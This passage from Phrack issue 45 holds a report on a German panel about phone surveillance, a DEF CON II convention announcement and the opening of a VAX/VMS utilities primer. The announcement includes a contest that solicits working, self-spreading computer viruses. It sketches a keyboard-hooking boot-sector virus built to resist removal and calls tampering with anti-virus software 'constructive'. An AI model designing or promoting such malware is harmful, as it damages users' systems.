the number of crimes. When you make more laws, you have more crimes. Every second action in this country is illegal. Journalist - Laws/crimes correlation is an over-simplification. There are more murders, even though there are no more laws against it. MdB - There is a conflict between internal security, protecting the constitution, and civil rights. How dangerous is 6 billion Marks of washed drug money to the nation? Taking the US as an example, the corrosion may have gone so far that it's too late to undo it. I hope that this point hasn't been reached yet in Germany. DsB - I am worried about a slippery slope. There is a tradeoff between freedom and security, and this is the wrong place to make it; other more effective measures aren't being taken up. EFFECTIVENESS OF CONTROLS ON EAVESDROPING MdB - Supposedly federal controls are effective. Although there are very few eavesdroping cases, even if you look at those that are court-approved, it's increasing exponentially. No proper brakes are built into the system. As for controls for eavesdroping by the intelligence service, there is a committee of three members of parliament, to whom all cases must be presented. They have final say, and I know one of the three, and have relatively much trust in him. They are also allowed to go into any PTT facility anytime, unannounced, to see whether or not something is being tapped or not. MdB - Policies for eavesdroping: if no trace of an applicable conversation is heard within the first "n" minutes, they must terminate the eavesdroping [...] The question is, at which point the most effective brakes and regulations should be applied: in the constitution? in the practice? PTT - True, but often the actual words spoken is not important, rather who spoke with whom, and when. DsB - There is no catalog for crimes, saying what measures can be applied in investigating which crimes. It's quite possible to use them for simple crimes, e.g. speeding. There is no law saying that the PTT *has to* store data; they *may*. They can choose technical and organizational solutions that don't require it. MdB - This is a valid point, I don't waive responsibility for such details. The PTT could be required to wipe out detailed information as soon as it is no longer needed, e.g. after the customer has been billed for a call. TECHNICAL TRENDS Journalist - Digital network techniques make it easy to keep trails, and there is an electronic trail produced as waste product, which can be used for billing as well as for other purposes. Load measurements are allowable, but it can also be used for tracking movements. DsB - The PTT claims they need detailed network data to better plan the network. The government says they need details in order to be able to govern us better. DsB - In the past, the trend has always been to increasingly identificable phone cards. There is economic pressure on the customer to use a billing card instead of a cash card, since a telephone unit costs less. With "picocells," your movement profile is getting more and more visible. PTT - As for the trend towards less-anonymous billing-cards: with the new ISDN networks, this is necessary. Billing is a major cost, and this is just a technical priority. Student - As for techniques to reduce potential for eavesdroping, it is for example technically possible to address a mobile phone without the network operator needing to know its position. Why aren't such things being pursued? PTT - UMTS is quite preliminary and not necessarily economically feasible. [Comments about debit cards]. We have more interest in customer trust than anything else. But when something is according to the law, we have no option other than to carry it out. But we don't do it gladly. THE BIG CONSPIRACY? CCC #2 - I don't give a shit about these phone conversations being overheard. I want to know why there is such a big controversy. Who wants what? Why is this so important? Why so much effort? Why are so many Mafia films being shown on TV when the eavesdroping law is being discussed? What's up? Why, and who are the people? Student - I am writing a book about this, and I haven't figured this out myself. My best theory: there are some politicians who have lost their detailed outlook ("Feinbild"), and they should be done away with ("abgeschaffen"). PTT - We're in a difficult position, with immense investments needed to be able to overhear phone conversations [in digital networks (?)]. We have no interest in a cover-up. MdB - As for the earlier question about what NATO countries may do. During the occupation of Berlin, they did want they wanted on the networks. In western Germany, it has always been debated. Funny business has never been proved, nor has suspicion been cleared up. CCC #2 - After further thought, I have another theory. American companies are interested in spying on German companies in order to get a jump on their product offerings. MdB - That's clear, but there are more benign explanations. Government offices tend towards creating work. Individuals are promoted if their offices expand, and they look for new fields to be busy in. In Bonn, we've gone from 4,000 people to 24,000 since the 50's. CCC #1 (to MdB) - Honestly, I don't see why you people in Bonn are anything other than one of these impenetrable bureaucracies like you described, inaccessible, out of touch with reality, and interested only in justifying their own existence. MdB - Well, *my* federal government isn't that. CLIPPER CHIP CONTROVERSY Student - Observation/concern: in the US, AT&T's encryption system is cheap and weak. If this becomes a de facto standard, it is much harder to introduce a better one later. Journalist - In the US, the Clipper chip controversy has centered more on the lost business opportunities for encryption technology, not on principles. There every suggestion for forbidding encryption has encountered stiff opposition. Student - As for the Clipper algorithm, it's quite easy to invite three experts to cursorily examine an algorithm (they weren't allowed to take documents home to study it) and then sign-off that they have no complaints. Journalist - As for the cursory rubber-stamping by the three experts who certified the Clipper algorithm, my information is that they had multiple days of computing days on a supercomputer available. I don't see a problem with the algorithm. The problem lies in the "trust centers" that manage the keys. I personally don't see why the whole question of cryptology is at all open ("zugaenglich") for the government. CONCLUDING REMARKS DsB - The question is not only whether or not politicians are separated from what the citizens want, but also of what the citizens want. Germans have a tendency to valuing security. Different tradition in the US, and less eavesdroping. I can imagine how the basic law ("Grundgesetz") could be eliminated in favor of regulations designed to reduce eavesdroping, the trade-off you (MdB) mentioned earlier. The headlines would look like "fewer cases of eavesdroping", "checks built in to the system," etc., everyone would be happy, and then once the law has been abolished, it would creep back up, and then there's no limit. MdB - (Nods agreement) CCC #2 - There are things that must be administered centrally (like the PTT), and the government is the natural choice, but I suggest that we don't speak of the "government," but rather of "coordination." This reduces the perceived "required power" aspect ... As a closing remark, I would like to suggest that we take a broader perspective, assume that a person may commit e.g. 5,000 DM more of theft in his lifetime, live with that, and save e.g. 100,000 DM in taxes trying to prevent this degree of theft. ------------------------------------------------------------------------------- MEDIA AND INFORMATION STRUCTURES In this session, a lot of time was wasted in pointless philosophical discussion of what is meant by Truth, although once this topic was forcefully ignored, some interesting points came up (I don't necessarily agree or disagree with these): - In electronic media, the receiver has more responsibility for judging truth placed on his shoulders. He can no longer assume that the sender is accountable. With "Network Trust," you would know someone who knows what's worthwhile, rather than filtering the deluge yourself. A primitive form of this already exists in the form of Usenet "kill" files. - A large portion of Usenet blather is due to people who just got their accounts cross-posting to the entire world. The actual posting is not the problem, rather that others follow it up with a few dozen messages debating whether or not it's really mis-posted, or argue that they should stop discussing it, etc. People are beginning to learn however, and the ripple effect is diminishing. - Companies such as Microsoft are afraid of the Internet, because its distributed form of software development means they are no longer the only ones able to marshal 100 or 1,000 people for a windowing system like X-Windows or Microsoft Windows. - If someone is trying to be nasty and knows what he's doing, a Usenet posting can be made to cost $500,000 in network bandwidth, disk space, etc. - At a Dutch university, about 50% of the network bandwidth could have been saved if copies of Playboy were placed in the terminal rooms. Such technical refinements as Gopher caching daemons pale in comparison. - All e-mail into or out of China goes through one node. Suspicious, isn't it? ------------------------------------------------------------------------------- ALTERNATIVE NETWORKS Several people reported about computer networks they set up and are operating. A sampling: APS+Hacktic - Rop Gonggrijp reported about networking services for the masses, namely Unix and Internet for about $15 per month, in Holland. There are currently 1,000 subscribers, and the funding is sufficient to break even and to expand to keep up with exponential demand. A German reported about efforts to provide e-mail to regions of ex-Yugoslavia that are severed from one another, either due to destroyed telephone lines or to phone lines being shut off by the government. A foundation provided them with the funds to use London (later Vienna), which is reachable from both regions, as a common node. The original author of the Zerberus mail system used on many private German networks complained about the degree of meta-discussion and how his program was being used for people to complain about who is paying what for networking services and so forth. He said he did not create it for such non-substantial blather. The difference between now and several years ago is that now there are networks that work, technically, and the problem is how to use them in a worthwhile manner. A German of Turkish origin is trying to allow Turks in Turkey to participate in relevant discussions on German networks (in German) and is providing translating services (if I heard right, some of this was being done in Sweden). This killed the rest of the session, which degenerated into a discussion of which languages were/are/should be used on which networks. ------------------------------------------------------------------------------- HOW AN INTELLIGENCE SERVICE WORKS: STASI TRAINING VIDEOS The person introducing the videos sat on the stage, the room darkened. The camera blotted out his upper body and face; all that was to see on the video, projected behind him, was a pair of hands moving around. It apparently didn't take much to earn a file in the Stasi archives. And once you were in there, the "10 W's: Wo/wann/warum/mit wem/..." ("where/when/why/with whom/...") ensured that the file, as well as those of your acquaintances, grew. The videos reported the following "case studies": - The tale of "Eva," whose materialistic lifestyle, contacts with Western capitalists, and "Abenteuerromantik" tendencies made her a clear danger to the state, as well as a valuable operative. She swore allegiance to the Stasi and was recruited. Eventually the good working relationship deteriorated, and the Stasi had to prevent her from trying to escape to the West. The video showed how the different parts of the intelligence service worked together. - A member of the military made a call to the consulate of West Germany in Hungary. The list of 10,000 possible travellers to Hungary in the relevant time frame was narrowed down to 6,000 on the basis of a determination of age and accent from the recorded conversation, then down to 80 by who would have any secrets to sell, then down to three (by hunch? I don't remember now). One video showed how a subversive was discreetly arrested. Cameras throughout the city were used to track his movements. When he arrived at his home, a few workers were "fixing" the door, which they claimed couldn't be opened at the moment. They walked him over to the next building to show him the entrance, and arrested him there. A dinky little East German car comes up, six people pile into it. Two uniformed police stand on the sidewalk pretending nothing is happening. ==Phrack Magazine== Volume Five, Issue Forty-Five, File 14 of 28 **************************************************************************** Updated Last : 3.14.1994 Late Night Hack Announcement #4.2 XXXXXXXXXXXXXXXXXXXXXXXX XX DEF CON II Convention Update Announcement XXXXXXXxxxxXXXXXXXXXXXXXXX XX DEF CON II Convention Update Announcement XXXXXXxxxxxxXXXXXX X X DEF CON II Convention Update Announcement XXXXXxxxxxxxxXXXXXXX X DEF CON II Convention Update Announcement XXXXxxxxxxxxxxXXXX XXXXXXXXX DEF CON II Convention Update Announcement XXXxxxxxxxxxxxxXXXXXXXXXX X DEF CON II Convention Update Announcement XXxxxxxxxxxxxxxxXXXXXX XX X DEF CON II Convention Update Announcement XXXxxxxxxxxxxxxXXXXXXXX DEF CON II Convention Update Announcement XXXXxxxxxxxxxxXXXXXXXX X XX DEF CON II Convention Update Announcement XXXXXxxxxxxxxXXXXXXXXXX XX X DEF CON II Convention Update Announcement XXXXXXxxxxxxXXXXXXXXX X DEF CON II Convention Update Announcement XXXXXXXxxxxXXXXXXXXXXXXXXX DEF CON II Convention Update Announcement XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX DEF CON II Convention Update Announcement READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE ============================================================================= What's this? This is an updated announcement and invitation to DEF CON II, a convention for the "underground" elements of the computer culture. We try to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies, Virii Coders, Programmers, Crackers, Cyberpunk Wannabees, Civil Liberties Groups, CypherPunks, Futurists, Artists, Etc.. WHO: You know who you are, you shady characters. WHAT: A convention for you to meet, party, and listen to some speeches that you would normally never hear. WHEN: July 22, 23, 24 - 1994 (Speaking on the 23rd and 24th) WHERE: Las Vegas, Nevada @ The Sahara Hotel So you heard about DEF CON I, and want to hit part II? You heard about the parties, the info discussed, the bizarre atmosphere of Las Vegas and want to check it out in person? Load up your laptop muffy, we're heading to Vegas! Here is what Three out of Three people said about last years convention: "DEF CON I, last week in Las Vegas, was both the strangest and the best computer event I have attended in years." -- Robert X. Cringely, Info World "Toto, I don't think we're at COMDEX anymore." -- CodeRipper, Gray Areas "Soon we were at the hotel going through the spoils: fax sheets, catalogs, bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds. The documents disappeared in seconds." -- Gillian Newson, New Media Magazine DESCRIPTION: Last year we held DEF CON I, which went over great, and this year we are planning on being bigger and better. We have expanded the number of speakers to included midnight tech talks and additional speaking on Sunday. We attempt to bring the underground into contact with "legitimate" speakers. Sure it's great to meet and party with fellow hackers, but besides that we try to provide information and speakers in a forum that can't be found at other conferences. While there is an initial concern that this is just another excuse for the evil hackers to party and wreak havoc, it's just not the case. People come to DEF CON for information and for making contacts. We strive to distinguish this convention from others in that respect. WHAT'S NEW THIS YEAR: This year will be much larger and more organized (hopefully) than last year. We have a much larger meeting area, and have better name recognition. Because of this we will have more speakers on broader topics. Expect speaking to run Saturday and Sunday, ending around 5 p.m. Some of the new things expected include: > An Internet connection with sixteen ports will be there, _BUT_ will only provide serial connections because terminals are too hard to ship. So bring a laptop with communications software if you want to connect to the network. Thanks to cyberlink communications for the connection. > There will be door prizes, and someone has already donated a Cell Phone and a few "Forbidden Subjects" cd ROMs to give away, thanks to Dead Addict. > Dr. Ludwig will present his virus creation awards on Sunday. > A bigger and better "Spot The Fed" contest, which means more shirts to give away. > More room, we should have tables set up for information distribution. If you have anything you want distributed, feel free to leave it on the designated tables. Yes, this year there will be a true 24 hour convention space. > A 24 hour movie / video suite where we will be playing all type of stuff. VHS Format. Mail me with suggested titles to show, or bring your own. We'll use a wall projector when not in use by speakers. > Midnight Tech Talks on Friday and Saturday night to cover the more technical topics and leave the days free for more general discussions. WHO IS SPEAKING:============================================================= This list represents almost all of the speakers verified to date. Some people do not want to be announced until the event for various reasons, or are waiting for approval from employers. A speaking schedule will go out in the next announcement. Philip Zimmerman, Notorious Cryptographer & Author of PGP. Dr. Ludwig, Author of "The Little Black Book of Computer Viruses," and "Computer Viruses, Artificial Life and Evolution" Loyd Blankenship (The Mentor), Net Running in the 90's and RPG. Padgett Peterson, Computer Enthusiast, Anti-Virus Programmer. The Jackal, A Radio Communications Overview, Digital Radio and the Hack Angle. Judi Clark, Computer Professionals for Social Responsibility. Gail Thackery, (Of Operation Sun Devil Fame), Topic to be Announced. To be Announced, The Software Publishers Association, Topic to be Announced. Toni Aimes, Ex U.S. West Cellular Fraud, Cellular Fraud Topics. Mark Lotter, Cellular Enthusiast, Hacking Cell Phones. Lorax, The Lighter Side of VMBs. Peter Shipley, Unix Stud, Q&A on Unix Security. George Smith, Crypt Newsletter, Virus Topic to be Announced. Cathy Compton, Attorney, Q&A Surrounding Seizure Issues, Etc. John Littman, Reporter and Author, Kevin Poulson, Mitnick, and Agent Steal. Red Five & Hellbender, Madmen With a Camcorder, Who Knows? Erik Bloodaxe, Phrack Editor, Wierd Wireless Psycho Shit.. Stay Tuned.. There should be a few round table discussions on Virus, Cellular, Unix and something else surrounding the industry. I'll name the rest of the speakers as they confirm. I'm still working on a few (Two?) people and groups, so hopefully things will work out and I can pass the good news on in the next announcement, or over our List Server. ============================================================================ WHERE THIS THING IS: It's in Las Vegas, the town that never sleeps. Really. There are no clocks anywhere in an attempt to lull you into believing the day never ends. Talk about virtual reality, this place fits the bill with no clunky hardware. If you have a buzz you may never know the difference. It will be at the Sahara Hotel. Intel is as follows: The Sahara Hotel: 1.800.634.6078 Room Rates: Single/Double $55, Triple $65, Suite $120 (Usually $200) + 8% tax Transportation: Shuttles from the airport for cheap. NOTE: Please make it clear you are registering for the DEF CON II convention to get the room rates. Our convention space price is based on how many people register. Register under a false name if it makes you feel better, 'cuz the more that register the better for my pocket book. No one under 21 can rent a room by themselves, so get your buddy who is 21 to rent for you and crash out. Try to contact people on the Interactive Mailing List (More on that below) and hook up with people. Don't let the hotel people get their hands on your baggage, or there is a mandatory $3 group baggage fee. Vegas has killer unions. OTHER STUFF: I'll whip up a list of stuff that's cool to check out in town there so if for some reason you leave the awesome conference you can take in some unreal sites in the city of true capitalism. If anyone lives in Las Vegas, I would appreciate it if you could send a list of some cool places to check out or where to go to see the best shows and I'll post it in the next announcement or in the program -> I am asking for people to submit to me any artwork, pictures, drawings, logos, etc. that they want me to try and include in this years program. I am trying to not violate any copyright laws, but want cool shit. Send me your art or whatever and I'll try and use it in the program, giving you credit for the work, of course. Please send it in .TIF format if it has more than eight bit color. The program will be eight bit black and white, -> in case you want to make adjustments on your side. PLEASE DONATE "STUFF" FOR THE GIVEAWAY: We are trying to raffle off interesting and old functional items. If you have anything such as old computers, modems, weird radio stuff, books, magazines, etc that you want to get rid of, please call or mail me with what it is, or bring it along. I don't want to waste peoples time giving away rubber bands or anything, but pretty much anything else will go. *** NEW MAILING LIST SERVER *** We've finally gotten Major Domo List Serv software working (Kinda) and it is now ready for testing. MTV spent a lot of time hacking this thing to work with BSDi, and I would like to thank him. The purpose of the list is to allow people interested in DEF CON II to chat with one another. It would be very useful for people over 21 who want to rent hotel space, but split costs with others. Just mention you have room for 'x' number of people, and I'm sure you'll get a response from someone wanting to split costs. Someone also suggested that people could organize a massive car caravan from Southern Ca. to the Con. My attitude is that the list is what you make of it. Here are the specifics: Umm.. I TAKE THAT BACK!! The mailing list is _NOT_ ready yet. Due to technical problems, etc. I'll do another mass mailing to everyone letting them know that the list is up and how to access it. Sorry for the delay! MEDIA: Some of the places you can look for information from last year include: New Media Magazine, September 1993 InfoWorld, 7-12-1993 and also 7-19-1993 by Robert X. Cringely Gray Areas Magazine, Vol 2, #3 (Fall 1993) Unix World, ???, Phrack #44, #45 COST: Cost is whatever you pay for a hotel room split however many ways, plus $15 if you preregister, or $30 at the door. This gets you a nifty 24 bit color name tag (We're gonna make it niftier this year) and your foot in the door. There are fast food places all over, and there is alcohol all over the place but the trick is to get it during a happy hour for maximum cheapness. ============================================================================ I wanted to thank whoever sent in the anonymous fax to Wired that was printed in issue 1.5 Cool deal! ============================================================================= FOR MORE INFORMATION: For InterNet users, there is a DEF CON anonymous ftp site at cyberspace.com in /pub/defcon. There are digitized pictures, digitized speeches and text files with the latest up to date info available. For email users, you can email dtangent@defcon.org for more information. For non-net people call: ---- A L L I A N C E ---- SysOp Metalhead One Thousand One Hundred Megabytes Online 612.251.8596 USRobotics 16.8 Dual Standard Synchronet Multinode BBS Software International Informational Retrieval Guild (IIRG) Distro Site Electronic Frontier Foundation (EFF) MEMBER American Bulletin Board Association (ABBA) MEMBER ----------------------------------------------------------------------- o 200+ Message bases. No post call ratio. Nope, not ever. o FidoNet [1:282/8004] o CyberCrime international [69:4612/2] o International Networked message ECHO areas: UFO, VIRUS, REPTILE, MUSIC, Twin Cities Chat, NORML, Telephone Watch, TRADEWARS, MONTE PYTHON, FCC, NO PIRACY, CLASSIFIEDS BBS Software & SYSOP Support, MUSIC, FISHING/HUNTING, Stephen King, Programming, Computers, Foreign Language, iCE/ACiD/TRiBE, COLLEGE LIVING, POLITICS, POETRY, RACISM, and too many more to mention o Computer Underground Magazines, History, Updates & Text o DEF CON Mirrior Archive o uXu, PHANTASY, CuD, EFF Magazine(s) Distro Site o Internet email mailbox (your.name.here@f8004.n282.z1.fidonet.org) o 30 day FULL ACCESS Trial Account...$10/year MEMBERship (sub. to change) ----------------------------------------------------------------------- For Snail Mail send to: DEF CON, 2709 E. Madison Street Suite #102, Seattle, WA, 98112 For Voice Mail and maybe a human (me), 0-700-TANGENT on an AT&T phone. A DEF CON Mailing list is maintained, and the latest announcements are mailed automatically to you. If you wish to be added to the list just send email to dtangent@defcon.org. ============================================================================= (Note, I have put a copy of Dr. Ludwig's new KOH Data security encryption Virus online at the DEF CON ftp site in /pub/defcon/KOH along with full documentation. Get CrAzY.) VIRUS CREATION AWARDS: Announcing The Second International Virus Writing Contest Sponsored by American Eagle Publications, Inc. P.O. Box 41401 Tucson, AZ 85717 USA and The Crypt Infosystems BBS +1 (818) 683-0854 *** The Goal *** The purpose of this contest is to write a fully functional computer virus that entertains people with political satire. Viruses will be judged on the basis of originality, creativity, functionality, and political incorrectness. *** Eligibility *** Anyone who can write a computer virus is eligible. *** Contest Dates *** The contest is underway from January 1, 1994 until June 30, 1994. Your submissions must be received by June 30 to qualify. The winner of the contest will be announced at the DEFCON conference in Las Vegas, July 22-24, 1994. If you can be present, an official award will be bestowed on you at that time. ************************************************************* Details ************************************************************* The philosopher Friedrik Nietzsche once said that if you want to kill something, you must laugh at it--and laugh at it deeply. So there should be little wonder that political satire is as old as politics itself. Is there something going on in the political arena that you abhor, that makes you sick, that is just plain wrong? Well, here's your chance to make a mockery of it. I've always had this idea that if someone wrote a sufficiently witty virus that really addressed the issues the way the people (not the press, not the politicians) saw them, it might just get passed around by people voluntarily. Let's find out. Write a virus that is itself a political satire. I don't mean a virus that simply displays a message. I mean a living entity whose every move--whose every action--is politically motivated. If you need more than one virus to make your point--perhaps two viruses working together, or something like that, that is fine. ----------------------------------------------------------- Let me give you a simple example: The Political Correctness Virus This virus is a spoof on the "political correctness" movement--which is just a form of self-imposed censorship--that is sweeping American intellectual circles, particularly colleges and universities. This virus is a memory resident boot sector virus which maintains a list of politically incorrect words on your computer system. It also hooks the keyboard interrupt and monitors every keystroke you make. If you type a politically incorrect word into the computer, the PCV springs into action. Politically incorrect words are ranked at three different offense levels. When the PCV encounters such a word, it determines what offense level that word is, and acts accordingly. The least offensive words merely register a beep. More offensive words cause a beep to sound for 10 seconds. The most offensive words cause a siren to sound for two minutes, locking the system for that duration. If you turn the computer off before the two minutes are up, the virus will stop the boot process for five minutes, with sirens, when you turn it back on. If you allow the siren to complete, then you can proceed. The virus has two different word lists, both stored in an encrypted and compressed format. The list is selected at random when the system is infected, after which it cannot be changed. The first list is the "proper" list of political correctness no-no's. For example, a word like "sodomite" is among the worst possible offenses. The second list is an inverted list of no-no's. This list trys to force you to use "sodomite" by flagging words like "gay" and "homosexual" as no-no's. If you allow the PCV to live in your system for three months without getting a single flag, you are given the supreme honor of viewing the word list assigned to you and adding a word to it. If you get more than 3000 flags in a lifetime, the virus will force you to enter a politically correct word before allowing you to start the computer, since you are obviously unwilling to submit to its censorship. The virus also uses powerful means to prevent disinfection, so that, once you get it, you can't get rid of it without a major effort. ------------------------------------------------------------ Now, I know you can get a lot more creative than this--so do it! Design your virus carefully, so that everything it does has meaning. Then send it in. Here are the criteria we'll use: 1. Originality: Your virus must be an original work. Do not send us anything that is not 100% yours. Your message should be original too. Do not just ape what everybody else is saying, especially the media. Also, a refined wit is much to be preferred over vulgarity. Vulgarity is a substitute for original wit. Foul language, porn, etc., are out. Destructive features should be incorporated only if they are VERY appropriate (perhaps if you are commenting on real live genocide in your country, or something like that). In general, though, destructive features will hurt you, not help you. The one exception is modifying anti-virus programs. That is considered to be CONstructive activity. 2. Creativity: Make us laugh, make us cry. Amaze us with how bits and bytes can say something about politics and issues. Think of it like this: displaying a message on the screen is like reading a text file. What we want is the equivalent of a multi-media extravaganza. Use all the system's resources to tell your message. Don't be afraid to write a virus that has some weird mode of infecting programs that tells a story, or to write one that sends faxes to the White House, or sends an automatic request for reams of free information to some government agency. 3. Functionality: The virus has to work. If it only works on some machines, or under some versions of DOS, or what-not, then that will count against you. The better it is at infecting systems and moving around, the better off you will be. So, for example, if you write a file-infector, make sure it can jump directories, and--if you're up to it--migrate across a network. 4. Political incorrectness: Since computer viruses are politically incorrect, their message should be too. If you send us a pro-establishment virus, then you will not win this contest. A word to the wise: think twice about what's correct and what's not. Many positions are only superficially incorrect, though they are really quite fashionable among the establishment. Look at it this way: if you could get a well-written letter expressing your view published in a big city newspaper, then it's not sufficiently incorrect. There are a LOT of ideas that are unofficially censored by society-- especially the media and academia. They tend to make themselves out to be the rebels, but they are really the establishment. If you can't think of anything creatively incorrect and sufficiently obnoxious then you shouldn't be writing viruses in the first place. ************************************************************* How to Submit an Entry You may mail your entry to American Eagle Publications at the above address, or you may e-mail it to ameagle@mcimail.com. Alternatively, you can submit it by dialing the Crypt Infosystems BBS and uploading it there. To get on to the system quickly, efficiently and anonymously, log on as VIRUS, using the password CONTEST. An entry consists of: 1. A complete copy of your virus, both source and executable files. 2. If the political satire isn't perfectly obvious, send a verbal description of how the virus works and why it does what it does. This is especially important if you are not an American and you are commenting on something that has not received worldwide attention. I don't care if you're Bulgarian and you're commenting on something we've never heard of--just make sure you explain it, or we won't understand and you'll lose. 3. If you want to be recognized for your work, include your name (real or handle), and a way we can get in contact with you. By submitting an entry, you grant American Eagle Publications, Inc. the right to publish your virus in any form. You agree not to make your virus public prior to July 25, 1994. If you do, you are automatically disqualified from the contest. For the sake of privacy, you may encrypt your entry and send it in with the following PGP key (which we highly recommend if you have PGP): -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.1 mQCNAi09jVgAAAEEAN3M9LFQXeBprkZuKo5NtuMC+82qNd3/8saHLO6iuGe/eUai 8Vx7yqqpyLjZDGbAS7bvobrcY3IyFeu8PXG4T8sd+g81P0AY0PHUqxxPG3COvBfP oRd+79wB66YCTjKSwd3KVaC7WG/CyXDIX5W6KwCaGL/SFXqRChWdf2BGDUCRAAUR tApDT05URVNUXzk0 =Z20c -----END PGP PUBLIC KEY BLOCK----- Good luck! **************************************************************** P R I Z E S In addition to instant worldwide fame and recognition, you'll get: 1. A cash prize of $100 US. 2. A year's subscription to Computer Virus Developments Quarterly. 3. Your virus will be published in Computer Virus Developments Quarterly, and other fine journals. 4. A handsome engraved plaque recognizing your contribution to the betterment of mankind. 5. A free secret surprise that we cannot tell you about right now, valued at $100. Two runner-ups will receive the secret surprise. !! GO FOR IT !! ============================================================================= STUFF TO SPEND YOUR MONEY ON: > Tapes of last years speakers (four 90 minute tapes) are available for $20 > DEF CON I tee-shirts (white, large only) with large color logo on the front, and on the back the Fourth Amendment, past and present. This is shirt v 1.1 with no type-o's. These are $20, and sweatshirts are $25. > DEF CON II tee-shirts will be made in various colors this year, including a few long sleeve shirts. Sizes will be in XL only again, with few white larges made. Shirts will be $15, Long Sleeve $17, Sweat shirts will be $20. Well, actually, I'll make a small quantity of various stuff, so with luck you'll find something you like. > We will have a few (ten maybe?) embroidered hats with this years logo. Not sure how much they will be.. like $10 maybe. > Full sized 4 color DEF CON II wall posters will be for sale for about $5. > Pre-Register for next year in advance for $15 and save half. > Make all checks/money orders/etc. out to DEF CON, and mail to the address above. Way above. Above the virus awards announcement. If you have any confidential info to send, use this PGP key to encrypt: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3 mQCrAiyI6OcAAAEE8Mh1YApQOOfCZ8YGQ9BxrRNMbK8rP8xpFCm4W7S6Nqu4Uhpo dLfIfb/kEWDyLreM6ers4eEP6odZALTRvFdsoBGeAx0LUrbFhImxqtRsejMufWNf uZ9PtGD1yEtxwqh4CxxC8glNA9AFXBpjgAZ7eFvtOREYjYO6TH9sOdZSa8ahW7YQ hXatVxhlQqve99fY2J83D5z35rGddDV5azd9AAUTtCZUaGUgRGFyayBUYW5nZW50 IDxkdGFuZ2VudEBkZWZjb24ub3JnPg== =ko7s -----END PGP PUBLIC KEY BLOCK----- - The Dark Tangent ==Phrack Magazine== Volume Five, Issue Forty-Five, File 15 of 28 **************************************************************************** ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Some Helpful VAX/VMS utilities ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Introduction : ^^^^^^^^^^^^ This article contains a brief introduction to some not so often used utilities, found on the Virtual Address eXtentions/ Virtual Memory System or better known to us as the VAX/VMS. Please note that this file is meant for the so called VMS "newbies". It gives an insight to the processes that are running in the different "Hibernation" states on VMS, quite similar to the background processes running on UNIX and its clones. If you have "extensive" experience on VMS as a systems programmer or a SysOp, you might want to skip it !! Portions of this file are taken from the ever blabbering VMS HELP, which is where many of us, myself included, learn about the VAX/VMS. VMS has lots of secrets. Locations of "hidden" files are a very well kept secret, known not even to the SysOp but only to the system programmer. Ok.... Lets get started... SHOW SYSTEM : ^^^^^^^^^^^ This command ($Show system) will display information about the status of the processes running on the system. There are various options to this command, some of which are listed below. /BATCH /CLUSTER /FULL /NETWORK /NODE /OUTPUT /PROCESS /SUBPROCESS 1. $ SHOW SYSTEM VAX/VMS 5.4 on node DARTH 19-APR-1990 17:45:47.78 Uptime 2 21:53:59 Pid Process Name State Pri I/O CPU Page flts Ph.Mem 27400201 SWAPPER HIB 16 0 0 00:29:52.05 0 0 27401E03 DOCBUILD LEF 4 37530 0 00:05:47.62 96421 601 27402604 BATCH_789 LEF 4 3106 0 00:00:48.67 4909 2636 B 27401C05 BATCH_60 LEF 6 248 0 00:00:06.83 1439 1556 B 27400207 ERRFMT HIB 8 6332 0 00:00:41.83 89 229 27400208 CACHE_SERVER HIB 16 2235 0 00:00:05.85 67 202 27400209 CLUSTER_SERVER HIB 8 4625 0 00:22:13.28 157 448 2740020C JOB_CONTROL HIB 10 270920 0 01:07:47.88 5163 1384 2740020D CONFIGURE HIB 9 125 0 00:00:00.53 104 264 . . . 27400E8D Sir Lancelot LEF 5 226 0 00:00:07.87 4560 697 2740049A Guenevere LEF 4 160 0 00:00:02.69 534 477 27401EA0 BATCH_523 CUR 4 4 17470 0 03:25:49.67 8128 5616 B 274026AF GAWAIN CUR 6 4 14045 0 00:02:03.24 20032 397 274016D5 GAHERIS LEF 6 427 0 00:00:09.28 5275 1384 27401ED6 knight_1 HIB 5 935 0 00:00:10.17 3029 2204 S 274012D7 BATCH_689 LEF 4 49216 0 00:14:18.36 7021 3470 B 274032D9 DECW$MAIL LEF 4 2626 0 00:00:51.19 4328 3087 B 274018E3 SERVER_0021 LEF 6 519 0 00:00:07.07 1500 389 N 274016E8 NMAIL_0008 HIB 4 10955 0 00:00:55.73 5652 151 274034EA MORDRED LEF 4 2132 0 00:00:23.85 5318 452 274022EB S. Whiplash CUR 6 4 492 0 00:00:12.15 5181 459 274018EF DwMail LEF 5 121386 0 00:28:00.97 7233 4094 27401AF0 EMACS$RTA43 LEF 4 14727 0 00:03:56.54 8411 4224 S 27400CF4 TRISTRAM HIB 5 25104 0 00:06:07.76 37407 1923 274020F5 Morgan LEF 7 14726 0 00:02:10.74 34262 1669 27400CF6 mr. mike LEF 9 40637 0 00:05:15.63 18454 463 The information in this example includes the following: o Process identification (PID) code-A 32-bit binary value that uniquely identifies a process. o Process name-A 1- to 15-character string used to identify a process. o Process state-The activity level of the process, such as COM (computing), HIB (hibernation), LEF (local event flag) wait, or CUR (if the process is current). If a multiprocessing environment exists, the display shows the CPU ID of the processor on which any current process is executing. Note that the SHOW SYSTEM command examines the processes on the system without stopping activity on the system. In this example process information changed during the time that the SHOW SYSTEM command collected the data to be displayed. As a result, this display includes two processes, named GAWAIN and S. Whiplash, with the state CUR on the same CPU, CPU ID 6 in the example. o Current priority-The priority level assigned to the process (the higher the number, the higher the priority). o Total process I/O count-The number of I/O operations involved in executing the process. This consists of both the direct I/O count and the buffered I/O count. o Charged CPU time-The amount of CPU time that a process has used thus far. o Number of page faults-The number of exceptions generated by references to pages that are not in the process's working set. o Physical memory occupied-The amount of space in physical memory that the process is currently occupying. o Process indicator-Letter B indicates a batch job; letter S indicates a subprocess; letter N indicates a network process. o User identification code (UIC)-An 8-digit octal number assigned to a process. This number is displayed only if the /FULL qualifier is specified. 2. $ SHOW SYSTEM /CLUSTER VAX/VMS V5.4 on node APPLE 19-APR-1990 09:09:58.61 Uptime 0 2:27:11 Pid Process Name State Pri I/O CPU Page flts Ph. Mem 31E00041 SWAPPER HIB 16 0 0 00:00:02.42 0 0 31E00047 CACHE_SERVER HIB 16 58 0 00:00:00.26 80 36 31E00048 CLUSTER_SERVER CUR 9 156 